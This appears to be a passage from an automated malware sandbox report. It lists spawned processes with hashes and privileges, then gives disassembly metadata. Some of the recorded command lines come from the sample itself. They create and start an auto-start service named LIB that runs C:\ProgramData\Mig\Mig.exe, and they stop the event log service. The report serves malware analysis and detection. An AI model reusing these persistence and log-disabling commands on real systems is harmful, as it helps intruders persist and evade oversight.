                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe delete "LIB"
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:32
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff651ec0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:33
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:35
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\winlogon.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:winlogon.exe
                                                  Imagebase:0x7ff6cc5a0000
                                                  File size:906'240 bytes
                                                  MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:36
                                                  Start time:08:07:51
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:37
                                                  Start time:08:07:51
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe start "LIB"
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:08:07:51
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:08:07:51
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:08:07:51
                                                  Start date:18/12/2024
                                                  Path:C:\ProgramData\Mig\Mig.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\ProgramData\Mig\Mig.exe
                                                  Imagebase:0x7ff746290000
                                                  File size:7'679'488 bytes
                                                  MD5 hash:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 63%, ReversingLabs
                                                  Has exited:true

                                                  General

                                                  Target ID:41
                                                  Start time:08:07:51
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\lsass.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\lsass.exe
                                                  Imagebase:0x7ff6b5fa0000
                                                  File size:59'456 bytes
                                                  MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:42
                                                  Start time:08:07:52
                                                  Start date:18/12/2024
                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                  Imagebase:0x7ff657fc0000
                                                  File size:468'120 bytes
                                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:43
                                                  Start time:08:07:52
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:08:07:52
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:45
                                                  Start time:08:07:53
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\dwm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"dwm.exe"
                                                  Imagebase:0x7ff7751a0000
                                                  File size:94'720 bytes
                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:46
                                                  Start time:08:07:56
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:47
                                                  Start time:08:07:56
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:48
                                                  Start time:08:07:57
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:49
                                                  Start time:08:07:57
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:50
                                                  Start time:08:07:57
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:51
                                                  Start time:08:07:58
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:52
                                                  Start time:08:07:58
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:53
                                                  Start time:08:07:59
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:54
                                                  Start time:08:08:00
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:55
                                                  Start time:08:08:00
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:56
                                                  Start time:08:08:01
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:57
                                                  Start time:08:08:01
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:58
                                                  Start time:08:08:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:59
                                                  Start time:08:08:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:60
                                                  Start time:08:08:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  Imagebase:0x7ff67e6d0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFB4AE616AE Relevance: .5, Instructions: 514COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1907262915.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d1bc40c71676d6f985090dcc97a04d15073d7375f5b83a57215e27f38f0f807
                                                    • Instruction ID: c1c3501779fd724e81e16024f09408a98eea8a434f80019b8b1735df144944dd
                                                    • Opcode Fuzzy Hash: 7d1bc40c71676d6f985090dcc97a04d15073d7375f5b83a57215e27f38f0f807
                                                    • Instruction Fuzzy Hash: 7CE103A294EBC60FE357BE3CC8651B57FE5FF42610B6805FED099C7193D909A8068392
                                                    Function 00007FFB4AE61834 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1907262915.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20fe88915a133599cc5096c1b8483e03536d9ac03340dc31ffcc181fc7fc2497
                                                    • Instruction ID: 3b303967e3aa6496632bf67653ef4fc64eea91d4ed6434b0e3a2da28bf3d309d
                                                    • Opcode Fuzzy Hash: 20fe88915a133599cc5096c1b8483e03536d9ac03340dc31ffcc181fc7fc2497
                                                    • Instruction Fuzzy Hash: 0C21C2A2A5FB8A4FE3A6BE3CC951174A6C6FF80B51BBC04F9D45CC3192DC1AAC054241
                                                    Function 00007FFB4AD937B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1906505526.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffb4ad90000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction ID: a5a19b85e83354a6d78a226a35342c92befcb8627a3b354713b004ca9612af00
                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction Fuzzy Hash: A701A77010CB0C8FD744EF0CE051AA6B3E0FB85320F10056DE58AC3661DA32E882CB41

                                                    Executed Functions

                                                    Function 00007FFB4AE66605 Relevance: .4, Instructions: 444COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1609253616.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae99e6a1ffc08cfe815763f6b0206d619bd32fe02209e82518a5eff936ab28f5
                                                    • Instruction ID: dceaebca53e4882c1303d373dc03d57875cd1d5eaf5a66aea6b35a7aa196201a
                                                    • Opcode Fuzzy Hash: ae99e6a1ffc08cfe815763f6b0206d619bd32fe02209e82518a5eff936ab28f5
                                                    • Instruction Fuzzy Hash: F3D166A291EB898FE7AABF7CC8550B57B95FF06710F6804FAD44CC7083DA18A805C391
                                                    Function 00007FFB4AD99748 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1608852919.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ad90000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a00184db5d4b31508642d902f02cb6f97797900f75977085bb2e9da862a68f19
                                                    • Instruction ID: 7f89eded57ad1b31e975d172e24acdf9c5a9ae777395720cc106645ffb6a39de
                                                    • Opcode Fuzzy Hash: a00184db5d4b31508642d902f02cb6f97797900f75977085bb2e9da862a68f19
                                                    • Instruction Fuzzy Hash: 35412971A1CF8C4FDB49AF6C9C4A6A87BF4FB55311F04416FE48983292DA20A855CBC3
                                                    Function 00007FFB4AC7ED40 Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1608450990.00007FFB4AC7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ac7d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c17991a0cc514c8addbc12763bd8793336bcec829a8ccb5100ce4469c52de4f4
                                                    • Instruction ID: 5a1659900a7093f7a494e57846413696d099380800e39bf23e673a7ca859350e
                                                    • Opcode Fuzzy Hash: c17991a0cc514c8addbc12763bd8793336bcec829a8ccb5100ce4469c52de4f4
                                                    • Instruction Fuzzy Hash: F641017140DBC08FE796DF389C419523FF4EB62220B1902DFD088CB5A3D629A846C7A2
                                                    Function 00007FFB4AD9B748 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1608852919.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ad90000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7879e9b40b700d041eef7a349db6a7d1393c3606b07995bcaed02333ac6c792
                                                    • Instruction ID: a802c5d9d10c5de9ef9a184d306ab9ef52f0dfdfb6e9ac88f39e4da5df713cd2
                                                    • Opcode Fuzzy Hash: e7879e9b40b700d041eef7a349db6a7d1393c3606b07995bcaed02333ac6c792
                                                    • Instruction Fuzzy Hash: 4E21F53190CB4C8FDB58EFACD84A7E97BE4EBA5321F04816FD449C3152D6709416CB91
                                                    Function 00007FFB4AD933B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1608852919.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ad90000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction ID: 2b143e5ab507eb3f1f3548a30d91cbc174cd29ca454cb2608341cf85fedbcd8c
                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction Fuzzy Hash: CF01A77010CB0C8FD744EF0CE051AA5B3E0FB85320F10056DE58AC3661DA32E882CB41
                                                    Function 00007FFB4AD99CF8 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1608852919.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ad90000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d613719cff010579d1e699afb745607c39bca8f20f22e799ede56c9e60283e1
                                                    • Instruction ID: 458461a2e019cda4c058657985cef454bff4074a4789a4e18dde770a1b929823
                                                    • Opcode Fuzzy Hash: 2d613719cff010579d1e699afb745607c39bca8f20f22e799ede56c9e60283e1
                                                    • Instruction Fuzzy Hash: 15F0B47180C68D4FEB4AEF3888995D5BFA0FF16311B1402DBE45CC70B2DB65A558CB92
                                                    Function 00007FFB4AE6414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1609253616.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9165932dea482c0df10e51bc1e307e0f0952ce35ae62cc764295a6c2dd35cc31
                                                    • Instruction ID: 7716c43a3f80c194951655e0c4508be210b0590e017e913bd3955a8f906c0d51
                                                    • Opcode Fuzzy Hash: 9165932dea482c0df10e51bc1e307e0f0952ce35ae62cc764295a6c2dd35cc31
                                                    • Instruction Fuzzy Hash: E5F09A72A8C5088FD75AFF6CE5418A873E4FF5932072100FAE16DC7163CA26EC818790
                                                    Function 00007FFB4AE64400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1609253616.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c89b90c6fa6022f9b52160fa9e6318da8c91991f71c6b409e5d45f38600279a9
                                                    • Instruction ID: 8008bac1d78fc5499fe886bcf5086b1a0fc5050940934fe7ee12f53f32e41319
                                                    • Opcode Fuzzy Hash: c89b90c6fa6022f9b52160fa9e6318da8c91991f71c6b409e5d45f38600279a9
                                                    • Instruction Fuzzy Hash: B1F0BE72A4C5448FD756FF2CE0428A8B7E4FF0972076100F6E15EC7063CA26AC81C750
                                                    Function 00007FFB4AE641D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1609253616.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: ea4191d6da80a047165f4a26392e7d903f28cdd2aca94eec90cb11aff5912f1a
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: AFE01A31B8C8088FDA68EE0CE2409E973E5FB9833176105F7D15EC7562CA22EC518B80

                                                    Non-executed Functions

                                                    Function 00007FFB4AE630E9 Relevance: .7, Instructions: 676COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1609253616.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ae60000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1240e3a6d0e543337dad550aa2d09ca8928ad7a683551b218cb7a416dd0b84e
                                                    • Instruction ID: ab11e9faea1740f4c13bb0fe9e0236bf755410850e1689e5bd8b42b049820233
                                                    • Opcode Fuzzy Hash: f1240e3a6d0e543337dad550aa2d09ca8928ad7a683551b218cb7a416dd0b84e
                                                    • Instruction Fuzzy Hash: 6F1214A294DBC60FE396BE3CC8551B07FE1EF96620B6905FBC499C7193D9189C0B8391
                                                    Function 00007FFB4AD984E3 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1608852919.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4ad90000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L_^$L_^$L_^$L_^$L_^
                                                    • API String ID: 0-2264858084
                                                    • Opcode ID: 5de3a2064f29ebfc76f02c80885127d76d1ff8014e5133b4ea2792f7f0cf57d6
                                                    • Instruction ID: eced134524d75477041df0879f7ce047b1959bcd3e0902361f05606a0f2f12fa
                                                    • Opcode Fuzzy Hash: 5de3a2064f29ebfc76f02c80885127d76d1ff8014e5133b4ea2792f7f0cf57d6
                                                    • Instruction Fuzzy Hash: 013195D3E1DAC20BF3435F3949A5098BFA9EF9762835E02F6C1D44F093EA09680B8741

                                                    Execution Graph

                                                    Execution Coverage:47.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:40.3%
                                                    Total number of Nodes:226
                                                    Total number of Limit Nodes:23
